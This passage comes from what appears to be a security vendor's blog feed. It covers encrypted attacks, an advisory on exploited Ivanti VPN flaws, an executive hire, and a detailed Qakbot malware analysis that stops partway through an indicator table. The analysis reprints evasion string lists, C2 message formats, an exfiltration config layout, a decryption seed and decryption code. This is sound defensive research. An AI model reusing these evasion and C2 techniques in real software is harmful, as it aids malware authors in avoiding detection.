security guard to keep everybody out anymore. VPNs and firewalls were designed to make organizations feel secure, but with all the evolving threats of today highlighting the cracks in these technologies, IT and security teams are left with a false sense of security. Truly secure digital transformation can only be delivered by implementing a zero trust architecture. The Zscaler Zero Trust Exchange is the comprehensive cloud platform designed to keep your users, workloads, IoT/OT, and B2B traffic safe in an environment where VPNs and firewalls can’t. If you’d like to learn more, join our webinar that serves as an introduction to zero trust and provides entry-level information about the topic. Or, if you’d like to go a level deeper, consider registering for one of our interactive whiteboard workshops for free Mon, 05 Feb 2024 14:26:59 -0800 Sid Bhatia Encrypted Attacks: Impact on Public Sector Following FBI and CISA warnings to public sector defenders in November regarding increased targeting by infamous ransomware groups, the imperative to understand and defend against evolving — and increasingly covert — cyber threats has intensified. According to Zscaler ThreatLabz analysis of the 2023 threat landscape, 86% of threats hide within encrypted traffic. What does this mean for the public sector? HTTPS has long been a cornerstone for protecting data, with nearly 95% of web traffic utilizing it today. For public sector entities like federal agencies and contractors, encryption is essential to meeting modern security and compliance requirements. However, despite its association with security and privacy protocols, the surge in encrypted attacks suggests that encryption is becoming more synonymous with “obscurity” than “security.” This blog post delves into the encrypted threats landscape, sheds light on how encrypted attacks can impact public sector organizations, and reveals four ways to stop encrypted threats with Zscaler. The encryption paradox escalates Encryption may be essential for data protection, but it simultaneously acts as a veil for malicious activities, from malware distribution to phishing scams, as proven in the recently released ThreatLabz State of Encrypted Attacks Report. ThreatLabz analysis of 29.8 billion threats revealed the striking percentage of threats embedded in encrypted traffic (86%) amounts to a 24.3% year-over-year growth in encrypted threats. This trend underscores the sophisticated and multifaceted nature of threats and tactics leveraging encrypted channels to evade detection. Understanding encrypted attacks Encrypted attacks exploit the very protocols designed to secure data transmission, making it challenging for traditional security measures to detect and thwart their activity. Our ThreatLabz report analyzes the top 10 encrypted threat categories, including emerging threats and unique attack vectors. Here's a look at the three most predominant encrypted threats and their operational dynamics: Malware distribution: Encrypted malware is the top threat, constituting 78.1% of observed attacks, and includes malicious payloads, infected web content, and viruses. The malware threat poses a significant risk to the integrity of public sector networks — including loss of control over critical systems and potential cascading effects on other critical operations. Ad spyware sites: 18.1% of encrypted attacks occurred through ad spyware sites. These websites covertly distribute adware and spyware, inundating users with intrusive pop-up ads. These attacks not only compromise user experience but also discreetly harvest personal data, raising privacy and security concerns. Phishing scams: Encrypted phishing increased by 13.7% year-over-year. Utilizing encrypted channels, cybercriminals host phishing sites that mimic legitimate websites, as demonstrated in the report. The most popular phishing attacks observed by ThreatLabz were linked to applications owned by Microsoft, Adobe, Google, Facebook, Amazon, Netflix, and others. These threats provide just a glimpse into the intricate landscape of encrypted attacks. Delving deeper involves understanding the current impact of encrypted attacks on critical public sector industries. Key considerations for public sector As the public sector has increasingly adopted encryption, it is not surprising that our research found public sector industries among those most impacted by encrypted attacks. Here are a few more key findings and considerations relevant to the public sector. For the complete findings and analysis, download this version of the report. The government sector experienced a sharp rise in encrypted attacks, with a 185% year-over-year increase. Government entities — especially those involved in election processes this year — are an attractive target for cybercriminals, including sophisticated nation-state-backed groups, due to their pivotal role in shaping and safeguarding national interests. The ThreatLabz team anticipates that advanced persistent threats (APTs), which have a history of election interference, will increasingly exploit encryption vulnerabilities to infiltrate target networks and conceal their activities. Education topped the government sector, however, with a 276% year-over-year surge in encrypted attacks. As the education sector continues to embrace digital transformation, adopting innovative systems and tools that handle vast amounts of sensitive student data expands its attack surface — amounting to greater vulnerability and desirability as a top target for encrypted attacks. The manufacturing industry, crucial to the supply chain of public sector organizations, experienced a 25.4% increase in encrypted attacks. The sector's embrace of Industry 4.0 has not only improved efficiency but has also expanded its attack surface. This expansion creates new entry points that cybercriminals increasingly exploit. Given its pivotal role in national security, attacks on the manufacturing sector pose significant risks to the public sector. While government and educational entities face distinctive risks when it comes to encrypted attacks, it is imperative for all public sector organizations, contractors, and suppliers to acknowledge and address these potential threats. The impact of encrypted threats goes beyond mere data breaches — it extends to the resilience of critical infrastructure and essential services and the integrity of national security. Public sector organizations must take strategic measures to secure encrypted traffic and fortify defenses against evolving encrypted threats. Encrypted threats across the attack chain It’s important to note that threat actors leverage encrypted channels across all stages of the attack chain — not just during compromise. As mentioned, cybercriminals frequently abuse legitimate, trusted websites to execute their attack, which means that public entities need a defense-in-depth strategy to counter them at all stages. As one example, in recent DuckTail operations exposed by Zscaler, these APTs hide their efforts with TLS encryption throughout all stages of attack. First, they target business Facebook, Google Ad, and TikTok accounts, luring users to fake ChatGPT and Google Bard AI pages to install malware payloads, which are hosted on trusted SaaS sites like DropBox and iCloud, and abuse their legitimate TLS certificates. Once those malware payloads are installed on users’ devices, they communicate with a GitLab URL for ongoing command-and-control (C2) activity — yet another trusted encrypted channel. Zscaler has worked closely with these organizations to take down DuckTail activity. However, this variety of encrypted attack remains prevalent. Without the ability to inspect encrypted SSL/TLS traffic throughout all stages of an attack, public sector entities may remain vulnerable. 4 steps to stop encrypted attacks Adopting a zero trust architecture is foundational to effectively stopping encrypted attacks at each stage of the attack sequence. The following four steps comprise a comprehensive strategy for public sector organizations to secure encrypted traffic and improve resilience: Inspect all encrypted traffic with a zero trust, cloud-proxy architecture: Employing a zero trust architecture is crucial for scanning all encrypted traffic at scale. SSL/TLS inspection should be applied for every packet on a per-user basis, ensuring infinite scalability. Minimize the attack surface: Hide internet-facing assets using a cloud proxy and restrict application access to only authorized users. This significantly reduces the attack surface and the risk of being discovered by attackers, mitigating potential encrypted attacks. Prevent initial compromise with inline threat prevention: Deploy inline defenses in the data path to detect and prevent encrypted threats efficiently. Core technologies should incorporate artificial intelligence and machine learning and include an AI/ML-driven cloud sandbox, cloud IPS, URL filtering, DNS filtering, and browser isolation. Stop data loss: Securing data in motion requires implementing inline data loss prevention (DLP) for inspecting SSL/TLS content. Incorporating AI-driven data discovery and classification is vital to prevent unauthorized data exfiltration and uphold the integrity of sensitive information. Read more about each of these steps in our report. Conclusion As the public sector confronts the evolving threat of encrypted attacks, it’s important to stay vigilant and adaptive. Understanding the nuances of encrypted attacks, inspecting all encrypted traffic, and implementing a comprehensive zero trust platform are indispensable steps for public sector organizations to effectively navigate the encryption paradox and defend against these attacks. Learn more about the encrypted threat landscape and how to improve your organization’s resilience to these attacks. Download the ThreatLabz 2023 State of Encrypted Attacks Report for additional guidance and the full findings and analysis. Mon, 05 Feb 2024 07:30:49 -0800 Jeremy James ThreatLabz Coverage Advisory: Ivanti’s VPN Vulnerabilities Exploited by Hackers, New Zero-Days Pose Critical Risk Introduction Ivanti, an IT management and security company, has issued a warning about multiple zero-day vulnerabilities in its VPN products exploited by Chinese state-backed hackers since December 2023. The initial disclosure involved two CVEs (CVE-2023-46805 and CVE-2023-21887) allowing a remote attacker to perform authentication bypass and remote command injection exploits. Ivanti released a patch which was immediately bypassed by two additional flaws (CVE-2024-21888 and CVE-2024-21893) that allows an attacker to perform privilege escalation and server-side request forgery exploits. The Cybersecurity & Infrastructure Security Agency (CISA) released an initial advisory as well as an emergency directive (ED-24-01) setting the timeline for mitigating the original two issues by 11:59PM EST January 22, 2024. In the wake of the two new vulnerabilities being discovered and no patches available, CISA issued a supplemental direction to the emergency directive instructing Federal Civilian Executive Branch agencies to disconnect all instances of Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) solutions no later than 11:59 PM EST February 2, 2024 from agency networks. Recommendations For CVE-2023-46805 and CVE-2023-21887 Apply the patch: Ivanti released a patch to address the initial two vulnerabilities. Users are advised to apply this patch promptly to secure their systems. Factory reset before patch: Ivanti recommends users to perform a factory reset on their appliance before applying the patch. This precautionary step aims to prevent potential threat actors from gaining upgrade persistence in the environment. For CVE-2023-21888 and CVE-2023-21893 CISA supplemental direction (ED-24-01): CISA instructed federal agencies to disconnect all instances of Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) solutions from agency networks. Although the CISA guidance mandates this for FCEB agencies, CISA highly recommends all organizations to follow the recommended steps. Apply the patches as they become available following the recommended guidance. For all discovered issues Prioritize segmentation of all potentially impacted systems from enterprise resources to reduce the blast radius. Continue threat hunting activity for all devices connected to and from the impacted Ivanti products. Monitor identity management services and authentication anomalies. Actively audit privileged accounts that were recently created or updated. Rotate certificates, keys, and passwords for all connected or exposed systems and applications. Attribution UTA0178, China’s government-backed hacking group motivated by espionage, is believed to be responsible for exploiting vulnerabilities in ICS VPN. The same group was attributed to the attacks concentrating on the Philippines using the MISTCLOAK, BLUEHAZE, and DARKDEW malware families. How It Works The attackers were observed exploiting two vulnerabilities CVE-2023-46805 (an authentication-bypass vulnerability with a CVSS score of 8.2) and CVE-2024-21887 (a command-injection vulnerability found in multiple web components with a CVSS score of 9.1) to gain access to ICS VPN appliances. Initial activity was observed as early as December 3, 2023. They were mostly living off the land but some tools were also deployed. Tools used by the threat actor include: PySoxy tunneler and BusyBox to enable post-exploitation activity ZIPLINE Passive Backdoor THINSPOOL Dropper LIGHTWIRE WIREFIRE, BUSHWALK, and CHAINLINE Web Shells WARPWIRE Attack Chain Figure 1: Diagram depicting the attack chain Possible Execution Initial Exploitation: The attackers performed mass scanning for vulnerable devices and potential automated exploitation. Persistence: The attackers deployed different variations of web shells on the targeted devices after successful exploitation. After gaining an initial foothold, the attacker could steal configuration data, modify existing files, download remote files, and reverse tunnel from the devices. In addition, the attackers backdoored configuration files and deployed additional tools. Reconnaissance: The attackers performed reconnaissance of the internal systems and applications through proxied connections. Credential Stealing: The attackers injected a custom JavaScript-based malware, called WARPWIRE, into a login page used by the users to capture and exfiltrate plaintext credentials. Lateral Movement: The attackers used lateral movement using compromised credentials to connect to internal systems via RDP, SMB, and SSH. Evidence Wiping: The attackers were observed wiping logs and even restoring the system to a clean state after deploying their payloads. Evasion (Patch and Detection): In some instances, the attackers modified the integrity checker tool (ICT) to disable and prevent it from flagging any modifications or additions on the system as a measure to evade detection. The ZIPLINE tool used by the attackers is capable of bypassing ICT detection by adding itself to the exclusion_list used by the ICT tool. Moreover, as the attacks were discovered and publicized, the attackers quickly adapted by modifying the tools to evade detection. As a result, new variants of the initial-attack are being observed in more recent attacks. How Zscaler Can Help Zscaler’s cloud native zero trust network access (ZTNA) solution gives users fast, secure access to private apps for all users, from any location. Reduce your attack surface and the risk of lateral threat movement—no more internet-exposed remote access IP addresses, and secure inside-out brokered connections. Easy to deploy and enforce consistent security policies across campus and remote users. Zscaler Private Access™ (ZPA) allows organizations to secure private app access from anywhere. Connect users to apps, never the network, with AI-powered user-to-app segmentation. Prevent lateral threat movement with inside-out connections. Deploy comprehensive cyberthreat and data protection for private apps with integrated application protection, deception, and data protection. Figure 2: VPN vulnerabilities open doors to cyber threats, protect against these risks with Zero Trust architecture. Zero trust is a fundamentally different architecture than those built upon firewalls and VPNs. It delivers security as a service from the cloud and at the edge, instead of requiring you to backhaul traffic to complex stacks of appliances (whether hardware or virtual). It provides secure any-to-any connectivity in a one-to-one fashion; for example, connecting any user directly to any application. It does not put any entities on the network as a whole, and adheres to the principle of least-privileged access. In other words, with zero trust, security and connectivity are successfully decoupled from the network, allowing you to circumvent the aforementioned challenges of perimeter-based approaches. Zero trust architecture: Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud. Stops compromise by leveraging the power of the cloud to inspect all traffic, including encrypted traffic at scale, in order to enforce policies and stop threats in real-time. Prevents lateral threat movement by connecting entities to individual IT resources instead of extending access to the network as a whole. Blocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, data at rest, and data in use. Additionally, zero trust architecture overcomes countless other problems associated with firewalls, VPNs, and perimeter-based architectures by enhancing user experiences, decreasing operational complexity, saving your organization money, and more. Zscaler ThreatLabz recommends our customers implement the following capabilities to safeguard against these type of attacks: Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access to establish user-to-app segmentation policies based on the principles of least privileged access, including for employees and third-party contractors. Limit the impact from a potential compromise by restricting lateral movement with identity-based microsegmentation. Prevent private exploitation of private applications from compromised users with full in-line inspection of private app traffic with Zscaler Private Access. Use Advanced Cloud Sandbox to prevent unknown malware delivered in second stage payloads. Detect and contain attackers attempting to move laterally or escalate privileges by luring them with decoy servers, applications, directories, and user accounts with Zscaler Deception. Identify and stop malicious activity from compromised systems by routing all server traffic through Zscaler Internet Access. Restrict traffic from critical infrastructure to an “allow” list of known-good destinations. Ensure that you are inspecting all SSL/TLS traffic, even if it comes from trusted sources. Turn on Advanced Threat Protection to block all known command-and-control domains. Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall, including emerging C&C destinations. Best Practices Follow CISA Directives Timely compliance with CISA’s Emergency Directive on Ivanti Vulnerabilities is critical for minimizing the impact of these vulnerabilities. Implement zero trust architecture Enterprises must rethink traditional approaches to security, replacing vulnerable appliances like VPNs and firewalls. Implementing a true zero trust architecture, fortified by AI/ML models, to block and isolate malicious traffic and threats is a critical foundational step. Prioritize user-to-application segmentation where you are not bringing users on the same network as your applications. This provides an effective way to prevent lateral movement and keep attackers from reaching crown jewel applications. Proactive Measures to Safeguard Your Environment In light of the recent vulnerabilities affecting Ivanti, it is imperative to employ the following best practices to fortify your organization against potential exploits. Minimize the attack surface: Make apps (and vulnerable VPNs) invisible to the internet, and impossible to compromise, ensuring an attacker can’t gain initial access. Prevent initial compromise: Inspect all traffic in-line to automatically stop zero-day exploits, malware, or other sophisticated threats. Enforce least privileged access: Restrict permissions for users, traffic, systems, and applications using identity and context, ensuring only authorized users can access named resources. Block unauthorized access: Use strong multi-factor authentication (MFA) to validate user access requests. Eliminate lateral movement: Connect users directly to apps, not the network, to limit the blast radius of a potential incident. Shutdown compromised users and insider threats: Enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data. Stop data loss: Inspect data in motion and data at rest to stop active data theft during an attack. Deploy active defenses: Leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real-time. Cultivate a security culture: Many breaches begin with compromising a single user account via a phishing attack. Prioritizing regular cybersecurity awareness training can help reduce this risk and protect your employees from compromise. Test your security posture: Get regular third-party risk assessments and conduct purple team activities to identify and harden the gaps in your security program. Request that your service providers and technology partners do the same and share the results of these reports with your security team. Conclusion In conclusion, Ivanti’s VPN products face severe security threats due to multiple zero-day vulnerabilities exploited by state-backed hackers. The initial disclosure revealed critical CVEs allowing unauthorized access and remote command injections. Following Ivanti’s patch release, two additional flaws enabling privilege escalation were swiftly exploited by the threat actors. CISA has responded with an advisory and emergency directive, setting deadlines for mitigating the original issues. With the discovery of new vulnerabilities and the absence of patches, CISA issued a supplemental directive, mandating Federal agencies to disconnect Ivanti ICS and IPS solutions from networks by 11:59pm EST, February 2, 2024. Fri, 02 Feb 2024 14:11:41 -0800 Deepen Desai Zscaler Appoints Steve McMahon as New Chief Customer Success Officer In the past year, Zscaler achieved a significant milestone by surpassing $2B in ARR. We take great pride in the fact that we accelerated from $1B to $2B ARR within a span of just seven quarters. Looking ahead, our sights are set on surpassing $5B ARR, a testament to our continuous growth and the trust placed in us by over 40% of Fortune 500 companies for their secure digital transformation. As we embark on this journey, we are diligently ensuring that our organizational structure and leadership are well-equipped to propel us to the next level of success. While Zscaler has many impressive stats about its business, the stat I’m most proud of is the Net Promoter Score (NPS) of over 70 while the average NPS score for SaaS companies is 30. This is driven by our innovative architecture and customer obsession which are part of our key values. The organization that plays a critical role in making sure our customers are delighted is Customer Success. To scale the customer success organization and continue exceeding expectations of our global customers, I’m excited to welcome Steve McMahon to Zscaler as our new Chief Customer Success Officer. This strategic addition to our leadership lineup demonstrates our ongoing commitment to delivering exceptional customer experiences and driving long-term growth. With over 25 years of customer success and services experience at a range of leading technology companies including Cisco, Splunk and, most recently, CrowdStrike, Steve has the expertise and know-how for developing strategies and programs that drive customer satisfaction, retention, and advocacy. His extensive experience in this space will enable us to further optimize our customer engagement model, ensuring that we are providing the right level of support at every stage of the customer journey. The trusted relationship we establish and cultivate with our customers is paramount to our business, which is why customer obsession has always been at the heart of everything we do. I am confident that Steve’s contributions will have a positive impact on our organization and help us maintain our focus on driving customer loyalty and satisfaction. Please join me in extending a warm welcome to Steve and a big thank you to the Zscaler team for your continued support and commitment to making Zscaler the leader in cloud security. Wed, 31 Jan 2024 11:01:44 -0800 Jay Chaudhry Tracking 15 Years of Qakbot Development Introduction Qakbot (aka QBot or Pinkslipbot) is a malware trojan that has been used to operate one of the oldest and longest running cybercriminal enterprises. Qakbot has evolved from a banking trojan to a malware implant that can be used for lateral movement and the eventual deployment of ransomware. In August 2023, the Qakbot infrastructure was dismantled by law enforcement. However, just several months later in December 2023, the fifth (and latest) version of Qakbot was released, marking more than 15 years of development. In this blog, we will analyze Qakbot from the first version dating back to 2008 through the most recent version that continues to be updated as of January 2024. Our analysis demonstrates the threat actor behind Qakbot is resilient, persistent, and innovative. Key Takeaways Qakbot originated in 2008 as a banking trojan designed to steal credentials and conduct ACH, wire, and credit card fraud. In recent years, Qakbot has become an initial access broker delivering Cobalt Strike for lateral movement and ultimately resulting in second-stage infections including ransomware like BlackBasta. Over the years, Qakbot’s anti-analysis techniques have improved to evade malware sandboxes, antivirus software, and other security products. The malware is modular and can download plugins that enable it to dynamically add new functionality. The threat group behind Qakbot has now released five distinct versions of the malware with the latest release in December 2023. A Brief History of Qakbot ThreatLabz researchers have been tracking Qakbot for more than a decade and our analysis started with samples that date back to 2008. These early versions of Qakbot contained a date timestamp rather than a version number. However, we will refer to these samples as version 1.0.0 for clarity and consistency with subsequent versions. At that time, Qakbot leveraged a dropper with two embedded components in the resource section that consisted of a malicious DLL and a tool to inject the DLL into running processes. The Qakbot DLL implemented a wide variety of features including: a SOCKS5 server, stealing passwords, harvesting web browser cookies, and spreading via SMB. These early versions were heavily developed and even had a feature to report crash dumps. In 2011, Qakbot introduced a versioning system that started with 2.0.0 that has signified major developmental milestones over time. The Qakbot major version number is a three-digit hexadecimal value with 0x500 (or 5.0.0) being the most recent. Qakbot was largely used for banking fraud until 2019, when the threat actor pivoted to serving as an initial access broker for ransomware including Conti, ProLock, Egregor, REvil, MegaCortex, and BlackBasta. The following timeline illustrates the key developments for each version of Qakbot. Each version of Qakbot represents a snapshot in time and is indicative of the threat landscape during that period. For instance, early versions contained hardcoded command-and-control (C2) servers. As time progressed, law enforcement and malware researchers worked successfully with domain registrars to suspend malicious domains. In response, the Qakbot threat actor added network encryption and implemented a solution to remove the C2 server’s single point of failure by adding a domain generation algorithm (DGA). While a DGA addressed the single point of failure issue, it also created significant noise when querying for a large number of domains. As a result, the Qakbot developer devised a new multi-tiered architecture that leveraged compromised systems to act as proxy servers that relay network traffic between other infected systems and the backend C2 infrastructure. This design update addressed the single point of failure problem, reduced network traffic, and effectively hid the subsequent C2 tiers. In the following sections, we will analyze key areas where Qakbot has evolved significantly including anti-analysis techniques, network communication, and the implementation of a modular design. Anti-Analysis Techniques Qakbot has implemented anti-analysis techniques from the beginning of its development including string obfuscation, API obfuscation, and malware sandbox evasion. String obfuscation Every version of Qakbot since its inception has obfuscated the malware’s important strings with a simple XOR algorithm. The XOR key (and most recently, the derivation of an XOR key) is used to decrypt strings. Moreover, the reference structure to the strings has also evolved across versions. In the first two versions (1.0 and 2.0), the malware decrypted a block of strings from the data section, overwriting the original encrypted block, and the unencrypted strings remained in memory as shown in Figure 1. This simple design was likely an attempt to evade static antivirus signatures. Figure 1. Early versions of Qakbot string obfuscation In later versions of Qakbot, the XOR key length was significantly increased, and strings were decrypted and copied to a newly allocated buffer. Qakbot version 5.0 made perhaps the most significant change to the string encryption algorithm. The strings are still encrypted with a simple XOR key. However, the XOR key is no longer hardcoded in the data section. Instead the XOR key is encrypted with AES, where the AES key is derived by performing a SHA256 hash of a buffer. A second buffer contains the AES initialization vector (IV) as the first 16 bytes, followed by the AES-encrypted XOR key. Once the XOR key has been decrypted, the block of encrypted strings can then be decrypted as shown in Figure 2. Figure 2. Qakbot 5.0 string decryption API obfuscation In versions 1 and 2, Qakbot carried a list of Windows API names used by the malware in the encrypted strings table. After the strings table was decrypted, the code would dynamically resolve the address of each API at runtime and then initialize a table of pointers that could then be used by Qakbot to invoke the corresponding function when required. This implementation made it harder for malware researchers and antivirus software to statically determine the APIs used at runtime. In more modern versions, the Qakbot developer further obfuscated the use of APIs by resolving the imports using a CRC32 hash rather than a string. At first, Qakbot used the CRC hashes of the API name directly, and subsequent versions performed an XOR with a hardcoded value and the CRC hash. Figure 3 shows an example of this dynamic API import hashing algorithm. Figure 3. Example Qakbot API obfuscation Junk code Over time, Qakbot has introduced blocks of code that are deliberately non-functional to defeat static antivirus signatures as shown in Figure 4. In the example below, a block of junk code was added prior to an RC4 initialization routine. Figure 4. Example of Qakbot junk code block in an RC4 initialization function Anti-sandbox techniques Qakbot has implemented numerous detection mechanisms to identify researcher environments and malware sandboxes since the earliest versions. In particular, Qakbot has attempted to identify processes, system artifacts, and the underlying virtual machines associated with an analysis environment. Figure 5 shows an example of Qakbot’s implementation to identify whether an infected system is running on a VMWare virtual machine from a sample dating back to September 2009. Figure 5. Qakbot implementation to identify VMWare Qakbot has continuously added code to identify analysis environments by checking system information such as the name of BIOS vendors, processes, drivers, etc. for strings as shown in Table 1. vmxnet vmx_svga vmrawdsk vmdebug vm3dmp vSockets srootkit sbtisht ansfltr Xen XENVIF XENSRC XENCLASS XENBUS Vmscsi VirtualBox Virtual Machine Virtual HD VirtIO VRTUAL VMware server memory VMware SVGA VMware SCSI VMware Replay VMware Pointing VMware Accelerated VMware VMW VMAUDIO VIRTUAL-DISK VBoxVideo QEMU PROD_VIRTUAL_DISK MS_VM_CERT CWSandbox 20202020 Table 1. Qakbot virtual machine string-based detections The following processes in Table 2 are frequently used by malware analysts and are also detected by Qakbot: frida-winjector-helper-32.exe packetcapture.exe filemon.exe proc_analyzer.exe sniff_hit.exe frida-winjector-helper-64.exe capturenet.exe procmon.exe sysAnalyzer.exe sysAnalyzer.exe tcpdump.exe qak_proxy idaq64.exe sniff_hit.exe BehaviorDumper.exe windump.exe dumpcap.exe loaddll32.exe joeboxcontrol.exe processdumperx64.exe ethereal.exe CFF Explorer.exe PETools.exe joeboxserver.exe anti-virus.EXE wireshark.exe not_rundll32.exe ImportREC.exe ResourceHacker.exe sysinfoX64.exe ettercap.exe ProcessHacker.exe LordPE.exe x64dbg.exe sctoolswrapper.exe rtsniff.exe tcpview.exe SysInspector.exe Fiddler.exe sysinfoX64.exe FakeExplorer.exe apimonitor-x86.exe idaq.exe dumper64.exe user_imitator.exe Table 2. Malware analyst process names detected by Qakbot Around version 404.510, the malware developer added extraneous exports to the Qakbot stager DLL to confuse malware sandboxes as shown in Figure 6. In this example, the export name Wind (or ordinal #458) is the actual entry point. Figure 6. Qakbot 404.510 sample with 458 entries in the exports directory Network CommunicationQakbot has leveraged HTTP for C2 communication from the beginning. However, the network protocol on top of HTTP has changed significantly over the years with encryption, RSA signature verification, and the addition of a JSON-based message format.Network protocol and encryptionQakbot has continuously updated its message protocol with version 19 being the latest. The protocol specifies the format of the message. In version 3, Qakbot sent requests in a format similar to the following:protoversion=9&r=1&n=kvtjmq970452&os=, this protocol format was later replaced with a JSON-based protocol with integer key values that denote specific fields as shown below:{ "8":1, "5":1035, "1":19, // protocol version "59":0, "3":"obama259", "4":1028, "10":1683022694, "2":"kqsvfc505763", "6":59661, "14":"Xgd1KxZQKTHGB6IxwtIy2e0RAq4iFNE6w6", "7":16759, "101":1, "26":"WORKGROUP", "73":0 }This encoding adds a layer of obfuscation for each of the message fields.Qakbot’s network encryption has used RC4 with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA1. The most recent version of Qakbot now uses AES encryption with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA256. After encryption, the data is Base64 encoded and prepended to a variable in the body of an HTTP POST request.Domain generation algorithmThe first versions of Qakbot only used hardcoded C2s as shown in Figure 7.Figure 7. Example of hardcoded Qakbot C2sHowever, in version 2.0.1 a DGA was added as a backup C2 channel in the event that the hardcoded C2s were unreachable. Qakbot used a time-based DGA to generate up to 5,000 C2 domains for a specific date interval as shown in Figure 8.Figure 8. Qakbot DGA codeInterestingly, some versions of Qakbot would generate fake domains if an analysis environment was detected in an effort to mislead researchers, as shown in Figure 9.Figure 9. Example of Qakbot generating fake domains if network monitoring tools were detectedData exfiltration to compromised FTP serversQakbot versions 3.0.0 and earlier used compromised FTP servers to exfiltrate data rather than sending the data directly to their C2 server. The FTP credentials were stored in Qakbot’s configuration files as shown below:22=<ip address 1>:[email protected]:<credspassword1>: 23=<ip address 2>:[email protected]:<credspassword2>: 24=<ip address 3>:[email protected]:<credspassword3>: 25=<ip address 4>:[email protected]:<credspassword4>: 26= 3=1581496845This design had an inherent weakness since anyone with the FTP credentials could potentially have accessed and recovered the stolen information. To address this weakness, Qakbot was later updated to send the stolen data directly to Qakbot’s C2 infrastructure.Using compromised systems as relaysAfter version, Qakbot ceased using the DGA. Instead, Qakbot started using compromised systems themselves as C2 servers, and embedded a list of IP addresses and port numbers in the malware configuration. Before version, the configuration file (stored as an encrypted resource) contained the list of IP addresses in a text-based format:;0;443;0;443;0;443;0;995;0;995;0;995;0;2222;0;443;0;443 …However, after version, the Qakbot C2 list evolved into a binary format as shown in Figure 10.Figure 10. Qakbot C2 list binary formatCommandsIn the first versions of Qakbot, the server sent commands in a descriptive text-based format. The following commands were supported in Qakbot versions 1.0 and 2.0:certssaveckkillcksaveclearvarscroncronloadcronsaveforceexecftpworkgetipinstall3instwdkillkillallloadconfnbscanpsdumpreloadrmsaveconfsleepsockssxordecsxorencsysinfothkillthkillalluninstallupdateupdate_finishuploaddatavarwgetIn order to obfuscate these commands, the Qakbot author replaced these string commands with integer values starting in the later builds of version 3.Addition of RSA signature verificationQakbot version introduced RSA digital signatures (initially using the MatrixSSL library) to prevent tampering. This was especially important when the DGA and compromised systems were used as C2 servers.Modular StructureThe design of Qakbot has changed significantly from versions 1 through 5. In particular, the malware has become more modular with the ability to dynamically add new features without releasing a new version of Qakbot. Modern versions use a lightweight stager responsible for initializing, maintaining persistence, and establishing C2 communication to request commands and modules.Embedded resourcesPrior to version, Qakbot frequently used the resource section to store configuration information (such as web injects and application parameters) as well as DLLs that performed malicious behavior. Initially, in version 1.0, these resources were not encrypted. However, Qakbot’s code evolved with various encryption algorithms to protect these resources.Qakbot version 2.0 implemented a custom XOR-based algorithm as shown in Figure 11.Figure 11. Custom encryption algorithm used by Qakbot 2.0 to protect resourcesIn this example, the offset 0x7 in the encrypted resource contained a WORD that was the size of the XOR key. The XOR key was located at offset 0x9 in the resource. Encrypted data was then concatenated after the XOR key. Python code that replicates this algorithm is shown below:import struct def custom_xor(data, key): out = b"" for i, eb in enumerate(data): v6 = eb ^ key[i % len(key)] v1 = (v6 & (0xff&(255 >> (8 - (i & 7))))) << (8 - (i & 7)) v2 = (v6 >> (i & 7)) v3 = v1 | v2 out += struct.pack("B", v3) return out s = open('res.bin', 'rb').read() key_sz = struct.unpack('H', s[7:9])[0] s = custom_xor(s[9+key_sz:], s[9:9+key_sz]) print(s)Qakbot version 3.0 and later used an RC4-based algorithm to decrypt the resources. The initial 0x14 bytes in the resource served as the RC4 key for decrypting the remaining data. A slightly modified version of the BriefLZ library was later added to compress specific resources to reduce the overall file size.In version, the resource encryption algorithm changed slightly. The first 0x14 bytes of the resource were no longer used as an RC4 key. Instead, the code contained a salt value in the encrypted strings table that was then hashed using SHA1 to derive the RC4 key used to decrypt the resource. In version this was improved again, which added two layers of RC4 to decrypt the resource. The first RC4 layer was decrypted using the SHA1 hash of the salt string. The second layer used the first 0x14 bytes of the result as the key to decrypt the following data. Example Python code for this algorithm is shown below:seed = b"Muhcu#YgcdXubYBu2@2ub4fbUhuiNhyVtcd" key = SHA1(seed).digest() dec_data = RC4(resource_data, key)[0x14:] data = RC4(dec_data[0x14:], dec_data[0:0x14])[0x14:]PluginsIn version 4.0.1, Qakbot was modified to split various functionality into separate modules. This allowed Qakbot to use a stager to download additional modules from Qabkot’s C2 servers to add functionality on-demand. Qakbot has built modules to hook web browsers, steal email addresses (and email), harvest stored credentials, deploy Cobalt Strike, and act as a C2 server that relays traffic between other infected systems and the backend infrastructure.Conclusion Qakbot is a sophisticated trojan that has evolved significantly over the past 15 years, and remains remarkably persistent and resilient. Despite the significant disruption to Qakbot in August 2023, the threat group remains active and recently updated their codebase to support 64-bit versions of Windows, improved the encryption algorithms, and added more obfuscation. This demonstrates that Qakbot will likely remain a threat for the foreseeable future and ThreatLabz will continue to add detections to protect customers. Zscaler Cloud Sandbox Zscaler’s multilayered cloud security platform detects payloads with the following threat names: Win32.Banker.Qakbot Indicators Of Compromise (IOCs) Date Version Sample Hash 2008-08-28 1.0.0 34588857312371e4b789fb49d2606386 2009-11-16 1.0.0 8c33780752e14b73840fb5cff9d31ba1 2009-12-29 1.0.0 37bbdaf1d14efa438f9ff34d8eeaa5e7 2010-10-12 d02252d88c3eab14488e6b404d2534eb 2011-05-12 b9e23bc3e496a159856fd60e397452a0 2012-05-31 570547fa75c15e6eb9e651f2a2ee0749 2013-07-08 42e724dc232c4055273abb1730d89f28 2014-06-24 9160ea12dbce912153b15db421bb87da 2015-01-28 945ba16316c8a6a8428f0b50db0381dc 2015-12-17 dca0ef26493b9ac3172adf931f1a3499 2016-01-04 6718c6af4b89cffd9b6e0c235cf85bd2 2016-01-04 8fbb43dc853d0b95829112931493fe22 2016-01-13 72125013ac58d05adb32b7406b02c296 2016-01-29 3b4a2e984a51210d0594c9b555ba4e0d 2016-02-09 f952dc1e942ebdfb95a2347263265438 2016-02-12 b849381ab6a4e97d32580bb52d15cb7d 2016-03-08 dc8b137d5d61b23dbbb6085ce46bfcdb 2016-04-05 327a5e491d6db899d9db4c6bdc8f5367 2016-04-05 e3b0e54777ca9fd9863e3563a1b7dd59 2016-04-06 